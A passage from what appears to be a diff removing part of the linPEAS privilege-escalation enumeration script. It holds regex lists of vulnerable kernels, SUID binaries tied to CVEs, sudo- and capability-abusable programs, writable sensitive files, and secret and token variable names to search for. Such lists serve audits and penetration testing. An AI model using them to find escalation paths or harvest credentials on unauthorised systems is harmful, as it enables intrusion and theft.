1.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6" 
-kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6" -kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.
18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7"
-
-
-MyUID=`id -u $(whoami)`
-if [ `echo $MyUID` ]; then myuid=$MyUID; elif [ `id -u $(whoami) 2>/dev/null` ]; then myuid=`id -u $(whoami) 2>/dev/null`; elif [ `id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1` ]; then myuid=`id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1`; fi
-if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi
-idB="euid|egid$baduid"
-sudovB="1.[01234567].[0-9]+|1.8\.1[0-9]*|1.8.2[01234567]"
-
-mounted=`(mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|'``cat /etc/fstab 2>/dev/null | grep -v "#" | grep " / " | cut -d " " -f 1`
-mountG="swap|/cdrom|/floppy|/dev/shm"
-notmounted=`cat /etc/fstab 2>/dev/null | grep "^/" | grep -v "$mountG" | cut -d " " -f1 | grep -v "$mounted" | tr '\n' '|'`"ImPoSSssSiBlEee"
-mountpermsB="\Wsuid|\Wuser|\Wexec"
-mountpermsG="nosuid|nouser|noexec"
-
-rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService"
-
-groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)"
-groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(wheel\)|\(disk\)|\(lxc\)"
-knw_grps='\(lpadmin\)|\(adm\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html
-mygroups=`groups 2>/dev/null | tr " " "|"`
-
-sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/expiry$|/fdformat$|/fusermount$|/fusermount3$|/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lprm$|/lpset$|/lxc-user-nic$" 
-sidG2="/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount.cifs$|/mount.nfs$|/mount.nfs4$|/mtr$|/mutt_dotlock$|/ncsa_auth$|/netpr$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/snap-confine$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/vmware-user-suid-wrapper$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$" - -#Rules: Start path " /", end path "$", divide path and vulnversion "%". 
SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION -sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ - /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\ - /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22 - /chfn$%SuSE_9.3/10\ - /chkey$%Solaris_2.5.1\ - /chkperm$%Solaris_7.0_\ - /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\ - /chpasswd$%SquirrelMail\(2004-04\)\ - /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\ - /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\ - /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\ - /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\ - /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\ - /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\ - /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\ - /keybase-redirector%CentOS_Linux_release_7.4.1708\ - /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\ - /lpc$%S.u.S.E_Linux_5.2\ - /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\ - /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\ - /movemail$%Emacs\(08-1986\)\ - /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\ - /newgrp$%HP-UX_10.20\ - /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\ - /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\ - /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)\ - /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\ - /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\ - /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\ - /rcp$%RedHat_6.2\ - /rdist$%Solaris_10/OpenSolaris\ - /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\ - /screen$%GNU_Screen_4.5.0\ - /sdtcm_convert$%Sun_Solaris_7.0\ - 
/sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\ - /sudo$\ - /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\ - /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\ - /traceroute$%LBL_Traceroute_\[2000-11-15\]\ - /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\ - /umount$%BSD/Linux\(08-1996\)\ - /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\ - /uucp$%Taylor_UUCP_1.0.6\ - /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\ - /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\ - /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\ - /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ - /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" -sidVB='/aria2c$|/arp$|/ash$|/awk$|/base64$|/bash$|/busybox$|/cat$|/chmod$|/chown$|/cp$|/csh$|/curl$|/cut$|/dash$|/date$|/dd$|/diff$|/dmsetup$|/docker$|/ed$|/emacs$|/env$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gdb$|/gimp$|/git$|/grep$|/head$|/ionice$|/ip$|/jjs$|/jq$|/jrunscript$|/ksh$|/ld.so$|/less$|/logsave$|/lua$|/make$|/more$|/mv$|/mysql$|/nano$|/nc$|/nice$|/nl$|/nmap$|/node$|/od$|/openssl$|/perl$|/pg$|/php$|/pic$|/pico$|/python$|/readelf$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/rvim$|/screen-4.5.0|/scp$|/sed$|/setarch$|/shuf$|/socat$|/sort$|/sqlite3$|/stdbuf$|/strace$|/systemctl$|/tail$|/tar$|/taskset$|/tclsh$|/tee$|/telnet$|/tftp$|/time$|/timeout$|/ul$|/unexpand$|/uniq$|/unshare$|/vim$|/watch$|/wget$|/xargs$|/xxd$|/zip$|/zsh$' - -sudoVB=" 
\*|env_keep\+=LD_PRELOAD|apt-get$|apt$|aria2c$|arp$|ash$|awk$|base64$|bash$|busybox$|cat$|chmod$|chown$|cp$|cpan$|cpulimit$|crontab$|csh$|curl$|cut$|dash$|date$|dd$|diff$|dmesg$|dmsetup$|dnf$|docker$|dpkg$|easy_install$|ed$|emacs$|env$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gdb$|gimp$|git$|grep$|head$|ionice$|ip$|irb$|jjs$|journalctl$|jq$|jrunscript$|ksh$|ld.so$|less$|logsave$|ltrace$|lua$|mail$|make$|man$|more$|mount$|mtr$|mv$|mysql$|nano$|nc$|nice$|nl$|nmap$|node$|od$|openssl$|perl$|pg$|php$|pic$|pico$|pip$|puppet$|python$|readelf$|red$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|smbclient$|socat$|sort$|sqlite3$|ssh$|start-stop-daemon$|stdbuf$|strace$|systemctl$|tail$|tar$|taskset$|tclsh$|tcpdump$|tee$|telnet$|tftp$|time$|timeout$|tmux$|ul$|unexpand$|uniq$|unshare$|vi$|vim$|watch$|wget$|wish$|xargs$|xxd$|yum$|zip$|zsh$|zypper$"
-sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|/apache2|/cryptsetup|/mount"
-sudoG="NOEXEC"
-
-sudocapsB="/apt-get|/apt|/aria2c|/arp|/ash|/awk|/base64|/bash|/busybox|/cat|/chmod|/chown|/cp|/cpan|/cpulimit|/crontab|/csh|/curl|/cut|/dash|/date|/dd|/diff|/dmesg|/dmsetup|/dnf|/docker|/dpkg|/easy_install|/ed|/emacs|/env|/expand|/expect|/facter|/file|/find|/flock|/fmt|/fold|/ftp|/gdb|/gimp|/git|/grep|/head|/ionice|/ip|/irb|/jjs|/journalctl|/jq|/jrunscript|/ksh|/ld.so|/less|/logsave|/ltrace|/lua|/mail|/make|/man|/more|/mount|/mtr|/mv|/mysql|/nano|/nc|/nice|/nl|/nmap|/node|/od|/openssl|/perl|/pg|/php|/pic|/pico|/pip|/puppet|/python|/readelf|/red|/rlwrap|/rpm|/rpmquery|/rsync|/ruby|/run-mailcap|/run-parts|/rvim|/scp|/screen|/script|/sed|/service|/setarch|/sftp|/smbclient|/socat|/sort|/sqlite3|/ssh|/start-stop-daemon|/stdbuf|/strace|/systemctl|/tail|/tar|/taskset|/tclsh|/tcpdump|/tee|/telnet|/tftp|/time|/timeout|/tmux|/ul|/unexpand|/uniq|/unshare|/vi|/vim|/watch|/wget|/wish|/xargs|/xxd|/yum|/zip|/zsh|/zypper"
-capsB="=ep|cap_chown|cap_dac_override|cap_dac_read_search|cap_setuid"
-
-OLDPATH=$PATH
-ADDPATH=":/usr/local/sbin\
- :/usr/local/bin\
- :/usr/sbin\
- :/usr/bin\
- :/sbin\
- :/bin"
-spath=":$PATH"
-for P in $ADDPATH; do
- if [ ! -z "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi
-done
-writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$"
-writeVB="/etc/anacrontab|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/systemd|/systemd/system|/var/spool/anacron|/var/spool/cron/crontabs|"`echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g'` #Add Path but remove simple dot in PATH
-
-if [ "$MACPEAS" ]; then
- sh_usrs="ImPoSSssSiBlEee"
- nosh_usrs="ImPoSSssSiBlEee"
- dscl . list /Users | while read uname; do
- ushell=`dscl . 
-read "/Users/$uname" UserShell | cut -d " " -f2`
- if [ "`grep \"$ushell\" /etc/shells`" ]; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi
- done
-else
- sh_usrs=`cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/'`"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere
- nosh_usrs=`cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/'`"ImPoSSssSiBlEee"
-fi
-knw_usrs='daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+'
-USER=`whoami`
-if [ ! "$HOME" ]; then
- if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home
- else HOME="/home/$USER";
- fi
-fi
-Groups="ImPoSSssSiBlEee"`groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|'`
-
-pwd_inside_history="7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@"
-pwd_in_variables="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID|AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_RE
PO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID|CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TO
KEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId|eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FI